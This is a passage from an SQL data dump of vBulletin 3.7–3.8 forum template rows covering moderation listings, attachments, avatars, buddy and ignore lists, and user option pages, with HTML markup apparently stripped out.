(1408, -1, 'moderation_picturebit', '\r\n \r\n ', '\r\n \r\n \r\n \r\n \r\n \r\n \r\n $pictureinfo[caption_preview] $vbphrase[picture] \r\n \r\n \r\n \r\n \r\n \r\n
$vbphrase[this_message_is_moderated]
\r\n
$vbphrase[caption]: $pictureinfo[caption_preview]
\r\n
$vbphrase[album]: $picture[albumtitle]
\r\n
$vbphrase[date]: $pictureinfo[date] $pictureinfo[time]
\r\n
\r\n \r\n \r\n
\r\n ', 'template', 1219147961, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1409, -1, 'moderation_picturecomments', '$memberinfo_css\r\n\r\n\r\n\r\n\".(($show[\'havemessages\']) ? (\"\r\n \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n\") : (\"\")).\"\r\n\r\n\r\n
\r\n \".(($show[\'havemessages\']) ? (\" \") : (\"\")).\"$vbphrase[messages] : $messagetotal \r\n $messagephrase\r\n
\r\n \".((!$show[\'havemessages\']) ? (\"\r\n
\r\n $vbphrase[no_posts_found] \r\n $vbphrase[try_controls_below_for_older_posts] \r\n
\r\n \") : (\"\r\n
\r\n $messagebits\r\n \r\n\r\n \".(($show[\'inlinemod\'] OR $pagenav) ? (\"\r\n
\r\n
\r\n \r\n \".(($show[\'inlinemod\']) ? (\"\r\n \r\n $vbphrase[moderation]
\r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n \".(($pagenav) ? (\"\r\n \r\n $pagenav\r\n \r\n \") : (\"\")).\"\r\n
\r\n
\r\n \") : (\"\")).\"\r\n \")).\"\r\n
\r\n\r\n\".(($show[\'havemessages\']) ? (\"\r\n \r\n\") : (\"\")).\"\r\n\r\n \r\n\r\n$moderation_filter', '$memberinfo_css\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n
\r\n $vbphrase[messages] : $messagetotal \r\n $messagephrase\r\n
\r\n
\r\n \r\n $vbphrase[no_posts_found] \r\n $vbphrase[try_controls_below_for_older_posts] \r\n
\r\n \r\n \r\n $messagebits\r\n \r\n\r\n \r\n \r\n
\r\n \r\n \r\n \r\n $vbphrase[moderation]
\r\n \r\n \r\n \r\n \r\n \r\n \r\n $pagenav\r\n \r\n \r\n
\r\n
\r\n \r\n \r\n
\r\n\r\n\r\n \r\n \r\n\r\n \r\n\r\n$moderation_filter', 'template', 1219151668, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1410, -1, 'moderation_pictures', '$memberinfo_css\r\n\r\n\r\n\r\n\".(($show[\'havepictures\']) ? (\"\r\n \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n\") : (\"\")).\"\r\n\r\n\r\n
\r\n \".(($show[\'havepictures\']) ? (\" \") : (\"\")).\"$vbphrase[pictures] : $picturetotal \r\n $messagephrase\r\n
\r\n \".((!$show[\'havepictures\']) ? (\"\r\n
\r\n $vbphrase[no_pictures_found] \r\n $vbphrase[try_controls_below_for_older_pictures] \r\n
\r\n \") : (\"\r\n
\r\n $picturebits\r\n \r\n\r\n \".(($show[\'inlinemod\'] OR $pagenav) ? (\"\r\n
\r\n \") : (\"\")).\"\r\n \")).\"\r\n
\r\n\r\n\".(($show[\'havepictures\']) ? (\"\r\n \r\n\") : (\"\")).\"\r\n\r\n \r\n\r\n$moderation_filter', '$memberinfo_css\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n
\r\n $vbphrase[pictures] : $picturetotal \r\n $messagephrase\r\n
\r\n
\r\n \r\n $vbphrase[no_pictures_found] \r\n $vbphrase[try_controls_below_for_older_pictures] \r\n
\r\n \r\n \r\n $picturebits\r\n \r\n\r\n \r\n \r\n \r\n \r\n
\r\n\r\n\r\n \r\n \r\n\r\n \r\n\r\n$moderation_filter', 'template', 1219151607, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1411, -1, 'moderation_posts', '\r\n\r\n\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n\r\n\r\n\r\n $postbits\r\n\r\n\") : (\"\r\n \r\n \r\n \r\n \r\n $vbphrase[no_posts_found] \r\n $vbphrase[try_controls_below_for_older_posts] \r\n
\r\n \r\n \r\n \r\n \r\n\")).\"\r\n\r\n\".(($show[\'haveposts\']) ? (\"\r\n\r\n \r\n\r\n \".(($show[\'popups\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n\") : (\"\")).\"\r\n\r\n \r\n\r\n\r\n \r\n\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n $vbphrase[display_options] \r\n \r\n\".(($totalposts) ? (\"\r\n\r\n \" . construct_phrase(\"$vbphrase[showing_results_x_to_y_of_z]\", \"$limitlower\", \"$limitupper\", \"$totalposts\") . \" \r\n \r\n\") : (\"\")).\"\r\n\r\n \r\n \r\n \r\n \r\n
\r\n\r\n \r\n\r\n \r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n $vbphrase[new_posts] \r\n \r\n \r\n \r\n $vbphrase[no_new_posts] \r\n \r\n
\r\n \r\n \r\n\r\n $forumjump \r\n \r\n
\r\n', '\r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n\r\n $postbits\r\n\r\n \r\n \r\n \r\n \r\n \r\n $vbphrase[no_posts_found] \r\n $vbphrase[try_controls_below_for_older_posts] \r\n
\r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n\r\n \r\n\r\n \r\n \r\n \r\n \r\n\r\n \r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n $vbphrase[display_options] \r\n \r\n\r\n\r\n $vbphrase[showing_results_x_to_y_of_z] \r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n
\r\n\r\n \r\n\r\n \r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n $vbphrase[new_posts] \r\n \r\n \r\n \r\n $vbphrase[no_new_posts] \r\n \r\n
\r\n \r\n \r\n\r\n $forumjump \r\n \r\n
\r\n', 'template', 1230727813, 'vBulletin Solutions', '3.8.0 Release Candidate 3', 'vbulletin'),
(1412, -1, 'moderation_threads', '\r\n\".(($show[\'pagenav\']) ? (\"\r\n\r\n\r\n $pagenav \r\n \r\n
\r\n\") : (\"\")).\"\r\n\r\n\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n\r\n\r\n\r\n\".(($show[\'havethreads\']) ? (\"\r\n \".(($show[\'ajax_js\']) ? (\"\r\n \r\n \r\n \") : (\"\")).\"\r\n\r\n\r\n \r\n\") : (\"\")).\"\r\n\r\n \r\n\r\n\r\n \r\n\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n \r\n \r\n \r\n\r\n\r\n\r\n $vbphrase[display_options] \r\n \r\n\".(($totalthreads) ? (\"\r\n\r\n \" . construct_phrase(\"$vbphrase[showing_threads_x_to_y_of_z]\", \"$limitlower\", \"$limitupper\", \"$totalthreads\") . \" \r\n \r\n\") : (\"\")).\"\r\n\r\n \r\n\r\n \r\n \r\n \r\n
\r\n \r\n\r\n \r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n $vbphrase[new_posts] \r\n \r\n \r\n \r\n $vbphrase[no_new_posts] \r\n \r\n \".(($GLOBALS[\'vbulletin\']->options[\'usehotthreads\']) ? (\"\r\n \r\n \r\n \" . construct_phrase(\"$vbphrase[more_than_x_replies_or_y_views]\", \"\" . $GLOBALS[\'vbulletin\']->options[\'hotnumberposts\'] . \"\", \"\" . $GLOBALS[\'vbulletin\']->options[\'hotnumberviews\'] . \"\") . \" \r\n \r\n \r\n \r\n \" . construct_phrase(\"$vbphrase[more_than_x_replies_or_y_views]\", \"\" . $GLOBALS[\'vbulletin\']->options[\'hotnumberposts\'] . \"\", \"\" . $GLOBALS[\'vbulletin\']->options[\'hotnumberviews\'] . \"\") . \" \r\n \r\n \") : (\"\")).\"\r\n \r\n \r\n $vbphrase[thread_is_closed] \r\n \r\n \".(($show[\'dotthreads\']) ? (\"\r\n \r\n \r\n $vbphrase[you_have_posted_in_this_thread] \r\n \r\n \") : (\"\")).\"\r\n
\r\n \r\n \r\n\r\n $forumjump \r\n \r\n
\r\n\r\n\r\n\".(($show[\'popups\'] AND $show[\'havethreads\']) ? (\"\r\n \r\n\") : (\"\")).\"', '\r\n\r\n\r\n\r\n $pagenav \r\n \r\n
\r\n \r\n\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n\r\n \r\n\r\n\r\n \r\n\r\n\r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n $vbphrase[display_options] \r\n \r\n\r\n\r\n $vbphrase[showing_threads_x_to_y_of_z] \r\n \r\n \r\n\r\n \r\n\r\n \r\n \r\n \r\n
\r\n \r\n\r\n \r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n $vbphrase[new_posts] \r\n \r\n \r\n \r\n $vbphrase[no_new_posts] \r\n \r\n \r\n \r\n \r\n $vbphrase[more_than_x_replies_or_y_views] \r\n \r\n \r\n \r\n $vbphrase[more_than_x_replies_or_y_views] \r\n \r\n \r\n \r\n \r\n $vbphrase[thread_is_closed] \r\n \r\n \r\n \r\n \r\n $vbphrase[you_have_posted_in_this_thread] \r\n \r\n \r\n
\r\n \r\n \r\n\r\n $forumjump \r\n \r\n
\r\n\r\n\r\n\r\n \r\n ', 'template', 1208876742, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1413, -1, 'moderation_visitormessages', '$memberinfo_css\r\n\r\n\r\n\r\n\".(($show[\'havemessages\']) ? (\"\r\n \r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n\") : (\"\")).\"\r\n\r\n\r\n
\r\n \".(($show[\'havemessages\']) ? (\" \") : (\"\")).\"$vbphrase[messages] : $messagetotal \r\n $messagephrase\r\n
\r\n \".((!$show[\'havemessages\']) ? (\"\r\n
\r\n $vbphrase[no_posts_found] \r\n $vbphrase[try_controls_below_for_older_posts] \r\n
\r\n \") : (\"\r\n
\r\n $messagebits\r\n \r\n \".(($show[\'inlinemod\'] OR $pagenav) ? (\"\r\n
\r\n \") : (\"\")).\"\r\n \")).\"\r\n
\r\n\r\n\".(($show[\'havemessages\']) ? (\"\r\n \r\n\") : (\"\")).\"\r\n\r\n \r\n\r\n$moderation_filter', '$memberinfo_css\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n
\r\n $vbphrase[messages] : $messagetotal \r\n $messagephrase\r\n
\r\n
\r\n \r\n $vbphrase[no_posts_found] \r\n $vbphrase[try_controls_below_for_older_posts] \r\n
\r\n \r\n \r\n $messagebits\r\n \r\n \r\n \r\n \r\n \r\n
\r\n\r\n\r\n \r\n \r\n\r\n \r\n\r\n$moderation_filter', 'template', 1219152135, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1414, -1, 'modifyattachments', '\r\n\r\n\r\n\r\n\r\n \r\n \".(($show[\'attachquota\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \" . construct_phrase(\"$vbphrase[attachments_posted_by_x]\", \"$username\") . \"\r\n \r\n \r\n \r\n\".(($show[\'attachquota\']) ? (\"\r\n\r\n \r\n \r\n \r\n
\r\n
\r\n $vbphrase[attachment_statistics] \r\n \r\n \r\n \" . construct_phrase(\"$vbphrase[currently_using_x_to_store_y_attachments]\", \"$attachsum\", \"$totalattachments\") . \" \r\n \r\n \".(($show[\'attachlimit\']) ? (\"\r\n \r\n \r\n \r\n \r\n \".(($show[\'currentattachsize\']) ? (\" \") : (\"\")).\"\r\n \".(($show[\'totalattachsize\']) ? (\" \") : (\"\")).\"\r\n \r\n
\r\n \r\n \r\n \") : (\"\")).\"\r\n
\r\n \r\n
\r\n
\r\n \r\n \r\n \r\n\") : (\"\")).\"\r\n\".(($show[\'attachment_list\']) ? (\"\r\n\r\n\r\n $vbphrase[attachment] \r\n $vbphrase[title] \r\n \".(($show[\'deleteoption\']) ? (\"\r\n $vbphrase[date] \r\n \r\n \") : (\"\r\n $vbphrase[date] \r\n \")).\"\r\n\r\n \r\n\r\n$template[attachmentlistbits]\r\n\r\n\r\n \r\n \r\n \r\n\") : (\"\r\n\r\n\r\n \r\n $vbphrase[you_have_no_attachments]
\r\n \r\n \r\n \r\n\")).\"\r\n
\r\n\r\n \r\n\r\n\".(($show[\'lightbox\']) ? (\"\r\n\r\n \r\n \r\n\r\n\") : (\"\")).\"\r\n\r\n\".(($pagenav) ? (\"\r\n\r\n\r\n $pagenav \r\n \r\n
\r\n\") : (\"\")).\"', '\r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n $vbphrase[attachments_posted_by_x] \r\n \r\n \r\n \r\n\r\n\r\n \r\n \r\n \r\n
\r\n
\r\n $vbphrase[attachment_statistics] \r\n \r\n \r\n $vbphrase[currently_using_x_to_store_y_attachments] \r\n \r\n \r\n \r\n \r\n \r\n \r\n $vbphrase[current_attachment_total_x]\"> \r\n $vbphrase[maximum_attachment_storage_x]\"> \r\n \r\n
\r\n \r\n \r\n \r\n
\r\n \r\n
\r\n
\r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n $vbphrase[attachment] \r\n $vbphrase[title] \r\n \r\n $vbphrase[date] \r\n \r\n \r\n $vbphrase[date] \r\n \r\n\r\n \r\n\r\n$template[attachmentlistbits]\r\n\r\n\r\n \r\n \r\n \r\n \r\n\r\n\r\n \r\n $vbphrase[you_have_no_attachments]
\r\n \r\n \r\n \r\n \r\n
\r\n\r\n \r\n\r\n\r\n\r\n \r\n \r\n\r\n \r\n\r\n\r\n\r\n\r\n $pagenav \r\n \r\n
\r\n ', 'template', 1208960526, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1415, -1, 'modifyattachmentsbit', '\r\n \r\n \r\n $post[size], \" . construct_phrase(\"$vbphrase[x_downloads]\", \"$post[counter]\") . \"
\r\n \r\n \r\n \r\n \r\n \r\n \".(($show[\'inprogress\']) ? (\"\r\n $vbphrase[in_progress] \r\n \") : (\"\r\n $post[postdate] \".((!$show[\'detailedtime\']) ? (\"$post[posttime] \") : (\"\")).\"
\r\n \")).\"\r\n \r\n \".(($show[\'deletebox\']) ? (\"\r\n \r\n \") : (\"\r\n \r\n \")).\"\r\n ', '\r\n \r\n \r\n $post[size],
$vbphrase[x_downloads] \r\n \r\n \r\n \r\n \r\n \r\n \r\n $vbphrase[in_progress] \r\n \r\n $post[postdate] $post[posttime]
\r\n \r\n \r\n \r\n \r\n \r\n \r\n \r\n ', 'template', 1201561215, 'vBulletin Solutions', '3.7.0 Beta 5', 'vbulletin'),
(1416, -1, 'modifyavatar', '\r\n\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n\r\n\r\n\r\n $vbphrase[edit_avatar] \r\n \r\n\r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[your_current_avatar] \r\n \r\n \r\n $currentavatar\r\n \r\n $vbphrase[avatars_small_graphics_short]
\r\n $vbphrase[do_not_use_an_avatar]
\r\n $vbphrase[note_have_custom_avatar_delete]
\r\n \r\n \r\n
\r\n \r\n\r\n \".(($show[\'forumavatars\']) ? (\"\r\n
\r\n \" . construct_phrase(\"$vbphrase[predefined_x]\", \"$categoryname\") . \" \r\n \r\n \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'customavatar\']) ? (\"\r\n
\r\n $vbphrase[custom_avatar] \r\n\r\n \r\n \r\n \") : (\"\")).\"\r\n\r\n
\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n ', '\r\n\r\n\r\n \r\n \r\n \r\n\r\n\r\n\r\n $vbphrase[edit_avatar] \r\n \r\n\r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[your_current_avatar] \r\n \r\n \r\n $currentavatar\r\n \r\n $vbphrase[avatars_small_graphics_short]
\r\n $vbphrase[do_not_use_an_avatar]
\r\n $vbphrase[note_have_custom_avatar_delete]
\r\n \r\n \r\n
\r\n \r\n\r\n
\r\n \r\n $vbphrase[predefined_x] \r\n \r\n \r\n \r\n\r\n
\r\n \r\n $vbphrase[custom_avatar] \r\n\r\n \r\n \r\n \r\n\r\n
\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n ', 'template', 1208875995, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1417, -1, 'modifyavatarbit', ' \r\n \r\n \r\n $avatar[title]\r\n \r\n \r\n', ' \r\n \r\n \r\n $avatar[title]\r\n \r\n \r\n', 'template', 1067805167, 'vBulletin Solutions', '', 'vbulletin'),
(1418, -1, 'modifyavatarbit_custom', '\r\n userinfo[\'avatarurl\'] . \"\\\" alt=\\\"$vbphrase[custom_avatar]\\\" border=\\\"0\\\" />\r\n ', '\r\n \r\n ', 'template', 1094754561, 'vBulletin Solutions', '', 'vbulletin'),
(1419, -1, 'modifyavatarbit_noavatar', '\r\n $vbphrase[no_avatar_specified] \r\n ', '\r\n $vbphrase[no_avatar_specified] \r\n ', 'template', 1072807062, 'vBulletin Solutions', '', 'vbulletin'),
(1420, -1, 'modifyavatar_category', ' $category[title] (\" . construct_phrase(\"$vbphrase[x_avatars]\", \"$category[avatars]\") . \") \r\n', ' $category[title] ($vbphrase[x_avatars] ) \r\n', 'template', 1070079040, 'vBulletin Solutions', '', 'vbulletin'),
(1421, -1, 'modifybuddylist', '\r\n\r\n \r\n $vbphrase[total]: $buddycount \r\n \".(($show[\'friend_controls\']) ? (\"$vbphrase[contacts_and_friends]\") : (\"$vbphrase[contacts]\")).\"\r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n
\r\n\r\n\r\n\".(($show[\'popups\']) ? (\"\r\n\r\n\") : (\"\")).\"\r\n\r\n', '\r\n\r\n \r\n $vbphrase[total]: $buddycount \r\n $vbphrase[contacts_and_friends] $vbphrase[contacts] \r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n
\r\n\r\n\r\n\r\n\r\n \r\n\r\n', 'template', 1213106768, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1422, -1, 'modifybuddylist_user', '\r\n \r\n \".(($show[\'outgoingrequest\']) ? (\"\r\n $vbphrase[friendship_requested]
\r\n \") : (\"\".(($show[\'friend_checkbox\']) ? (\"\r\n \r\n $vbphrase[friend] \r\n \".(($user[\'extended_type\'] == \'friend\') ? (\" \") : (\"\")).\"\r\n
\r\n \") : (\"\")).\"\")).\"\r\n \r\n \r\n', '\r\n \r\n \r\n $vbphrase[friendship_requested]
\r\n \r\n \r\n $vbphrase[tick_box_to_make_friends_with_x]\" />$vbphrase[friend] \r\n \r\n
\r\n \r\n \r\n \r\n', 'template', 1197388197, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1423, -1, 'modifyignorelist', '\r\n\r\n $vbphrase[ignore_list] \r\n \r\n\r\n \r\n \r\n \r\n \r\n
\r\n\r\n\r\n\".(($show[\'popups\']) ? (\"\r\n\r\n\") : (\"\")).\"\r\n\r\n', '\r\n\r\n $vbphrase[ignore_list] \r\n \r\n\r\n \r\n \r\n \r\n \r\n
\r\n\r\n\r\n\r\n\r\n \r\n\r\n', 'template', 1213273344, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1424, -1, 'modifyignorelist_user', '\r\n session->vars[\'sessionurl\'] . \"u=$user[userid]\\\">$user[username] \r\n ', '\r\n $user[username] \r\n ', 'template', 1204241120, 'vBulletin Solutions', '3.7.0 Beta 6', 'vbulletin'),
(1425, -1, 'modifyoptions', '\r\n\r\n\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n\r\n$template_hook[usercp_options_start]\r\n\r\n\r\n\r\n\r\n $vbphrase[edit_options]: \" . $GLOBALS[\'vbulletin\']->userinfo[\'username\'] . \" \r\n \r\n\r\n \r\n \r\n $vbphrase[login_privacy]\r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n
\r\n\r\n \".(($show[\'invisibleoption\']) ? (\"\r\n
\r\n $vbphrase[use_invisible_mode] \r\n \r\n \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'reputationoption\']) ? (\"\r\n
\r\n $vbphrase[show_your_reputation_level] \r\n \r\n \r\n \") : (\"\")).\"\r\n\r\n
\r\n $vbphrase[allow_vcard_download] \r\n \r\n \r\n\r\n $template_hook[usercp_options_privacy]\r\n\r\n $customfields[login]\r\n\r\n
\r\n
\r\n \r\n \r\n \r\n
\r\n\r\n \r\n\r\n\r\n\r\n\r\n \r\n \r\n $vbphrase[messaging_notification]\r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n
\r\n\r\n \r\n\r\n\r\n\r\n \r\n \r\n \r\n $vbphrase[thread_display_options]\r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[visible_post_elements] \r\n \r\n \r\n\r\n
\r\n $vbphrase[thread_display_mode] \r\n \r\n \r\n \" . construct_phrase(\"$vbphrase[choose_thread_display_mode]\", \"faq.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"faq=vb3_board_usage#faq_vb3_thread_display\") . \" \r\n \r\n \r\n \r\n \r\n \r\n $vbphrase[linear] - $vbphrase[oldest_first] \r\n $vbphrase[linear] - $vbphrase[newest_first] \r\n \".(($GLOBALS[\'vbulletin\']->options[\'allowthreadedmode\']) ? (\"\r\n $vbphrase[threaded] \r\n $vbphrase[hybrid] \r\n \") : (\"\")).\"\r\n \r\n \r\n $vbphrase[thread_display_mode]: \r\n \r\n \r\n
\r\n \r\n\r\n \".(($show[\'maxpostsoptions\']) ? (\"\r\n
\r\n $vbphrase[posts_to_show_per_page] \r\n \r\n \r\n $vbphrase[use_set_posts_before_splitting] \r\n \r\n \r\n \r\n \r\n \r\n $vbphrase[use_forum_default] \r\n $maxpostsoptions\r\n \r\n \r\n $vbphrase[posts_to_show_per_page]: \r\n \r\n \r\n
\r\n \r\n \") : (\"\r\n
userinfo[\'maxposts\'] . \"\\\" />\r\n \")).\"\r\n\r\n
\r\n $vbphrase[default_thread_age_cut_off] \r\n \r\n \r\n $vbphrase[time_period_to_display_threads] \r\n \r\n \r\n \r\n \r\n \r\n $vbphrase[use_forum_default] \r\n $vbphrase[show_threads_from_last_day] \r\n \" . construct_phrase(\"$vbphrase[show_threads_from_last_x_days]\", \"2\") . \" \r\n $vbphrase[show_threads_from_last_week] \r\n \" . construct_phrase(\"$vbphrase[show_threads_from_last_x_days]\", \"10\") . \" \r\n \" . construct_phrase(\"$vbphrase[show_threads_from_last_x_weeks]\", \"2\") . \" \r\n $vbphrase[show_threads_from_last_month] \r\n \" . construct_phrase(\"$vbphrase[show_threads_from_last_x_days]\", \"45\") . \" \r\n \" . construct_phrase(\"$vbphrase[show_threads_from_last_x_months]\", \"2\") . \" \r\n \" . construct_phrase(\"$vbphrase[show_threads_from_last_x_days]\", \"75\") . \" \r\n \" . construct_phrase(\"$vbphrase[show_threads_from_last_x_days]\", \"100\") . \" \r\n $vbphrase[show_threads_from_last_year] \r\n $vbphrase[show_all_threads] \r\n \r\n \r\n $vbphrase[default_thread_age_cut_off]: \r\n \r\n \r\n
\r\n \r\n\r\n $template_hook[usercp_options_threadview]\r\n\r\n $customfields[threadview]\r\n\r\n
\r\n
\r\n \r\n \r\n \r\n
\r\n\r\n \r\n\r\n\r\n\r\n \r\n \r\n \r\n $vbphrase[date_time_options]\r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n
\r\n\r\n $timezoneoptions\r\n\r\n
\r\n $vbphrase[start_of_the_week] \r\n \r\n \r\n $vbphrase[parts_use_different_start_of_week] \r\n \r\n \r\n \r\n \r\n \r\n $vbphrase[sunday] \r\n $vbphrase[monday] \r\n $vbphrase[tuesday] \r\n $vbphrase[wednesday] \r\n $vbphrase[thursday] \r\n $vbphrase[friday] \r\n $vbphrase[saturday] \r\n \r\n \r\n $vbphrase[start_of_the_week]: \r\n \r\n \r\n
\r\n \r\n\r\n $template_hook[usercp_options_datetime]\r\n\r\n $customfields[datetime]\r\n\r\n
\r\n
\r\n \r\n \r\n \r\n
\r\n\r\n \r\n\r\n\r\n\r\n \r\n \r\n $vbphrase[miscellaneous_options]\r\n \r\n \r\n\r\n \r\n \r\n
\r\n\r\n \".(($show[\'editormode_picker\']) ? (\"\r\n
\r\n $vbphrase[message_editor_interface] \r\n \r\n \r\n $vbphrase[entering_message_three_interface] \r\n \r\n \r\n \r\n \r\n \r\n $vbphrase[basic_editor_simple_text_box] \r\n $vbphrase[standard_editor_extra_formatting] \r\n \".(($show[\'editormode_wysiwyg\']) ? (\"\r\n $vbphrase[enhanced_interface_wysiwyg] \r\n \") : (\"\")).\"\r\n \r\n \r\n $vbphrase[message_editor_interface]: \r\n \r\n \r\n
\r\n \r\n \") : (\"\r\n
userinfo[\'showvbcode\'] . \"\\\" />\r\n \")).\"\r\n\r\n \".(($show[\'styleoption\']) ? (\"\r\n
\r\n $vbphrase[board_skin] \r\n \r\n \r\n \r\n $vbphrase[switch_skin_select]\r\n \r\n \r\n \r\n \r\n \r\n \r\n $stylesetlist\r\n \r\n \r\n $vbphrase[board_skin]: \r\n \r\n \r\n
\r\n \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'usercssoption\']) ? (\"\r\n
\r\n\r\n $vbphrase[user_customizations] \r\n \r\n \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'languageoption\']) ? (\"\r\n
\r\n $vbphrase[board_language] \r\n \r\n \r\n $vbphrase[board_can_be_shown_any_language] \r\n \r\n \r\n \r\n \r\n \r\n $vbphrase[use_forum_default] \r\n $languagelist\r\n \r\n \r\n $vbphrase[board_language]: \r\n \r\n \r\n
\r\n \r\n \") : (\"\")).\"\r\n\r\n $template_hook[usercp_options_other]\r\n\r\n $customfields[other]\r\n\r\n
\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n$template_hook[usercp_options_end]\r\n\r\n ', '\r\n\r\n\r\n \r\n \r\n \r\n\r\n$template_hook[usercp_options_start]\r\n\r\n\r\n\r\n\r\n $vbphrase[edit_options]: $bbuserinfo[username] \r\n \r\n\r\n \r\n \r\n $vbphrase[login_privacy]\r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n
\r\n\r\n
\r\n \r\n $vbphrase[use_invisible_mode] \r\n \r\n \r\n \r\n\r\n
\r\n \r\n $vbphrase[show_your_reputation_level] \r\n \r\n \r\n \r\n\r\n
\r\n $vbphrase[allow_vcard_download] \r\n \r\n \r\n\r\n $template_hook[usercp_options_privacy]\r\n\r\n $customfields[login]\r\n\r\n
\r\n
\r\n \r\n \r\n \r\n
\r\n\r\n \r\n\r\n\r\n\r\n\r\n \r\n \r\n $vbphrase[messaging_notification]\r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n
\r\n\r\n \r\n\r\n\r\n\r\n \r\n \r\n \r\n $vbphrase[thread_display_options]\r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[visible_post_elements] \r\n \r\n \r\n\r\n
\r\n $vbphrase[thread_display_mode] \r\n \r\n \r\n $vbphrase[choose_thread_display_mode] \r\n \r\n \r\n \r\n \r\n \r\n $vbphrase[linear] - $vbphrase[oldest_first] \r\n $vbphrase[linear] - $vbphrase[newest_first] \r\n \r\n $vbphrase[threaded] \r\n $vbphrase[hybrid] \r\n \r\n \r\n \r\n $vbphrase[thread_display_mode]: \r\n \r\n \r\n
\r\n \r\n\r\n
\r\n \r\n $vbphrase[posts_to_show_per_page] \r\n \r\n \r\n $vbphrase[use_set_posts_before_splitting] \r\n \r\n \r\n \r\n \r\n \r\n $vbphrase[use_forum_default] \r\n $maxpostsoptions\r\n \r\n \r\n $vbphrase[posts_to_show_per_page]: \r\n \r\n \r\n
\r\n \r\n \r\n \r\n \r\n\r\n
\r\n $vbphrase[default_thread_age_cut_off] \r\n \r\n \r\n $vbphrase[time_period_to_display_threads] \r\n \r\n \r\n \r\n \r\n \r\n $vbphrase[use_forum_default] \r\n $vbphrase[show_threads_from_last_day] \r\n $vbphrase[show_threads_from_last_x_days] \r\n $vbphrase[show_threads_from_last_week] \r\n $vbphrase[show_threads_from_last_x_days] \r\n $vbphrase[show_threads_from_last_x_weeks] \r\n $vbphrase[show_threads_from_last_month] \r\n $vbphrase[show_threads_from_last_x_days] \r\n $vbphrase[show_threads_from_last_x_months] \r\n $vbphrase[show_threads_from_last_x_days] \r\n $vbphrase[show_threads_from_last_x_days] \r\n $vbphrase[show_threads_from_last_year] \r\n $vbphrase[show_all_threads] \r\n \r\n \r\n $vbphrase[default_thread_age_cut_off]: \r\n \r\n \r\n
\r\n \r\n\r\n $template_hook[usercp_options_threadview]\r\n\r\n $customfields[threadview]\r\n\r\n
\r\n
\r\n \r\n \r\n \r\n
\r\n\r\n \r\n\r\n\r\n\r\n \r\n \r\n \r\n $vbphrase[date_time_options]\r\n \r\n \r\n \r\n\r\n \r\n \r\n \r\n
\r\n\r\n $timezoneoptions\r\n\r\n
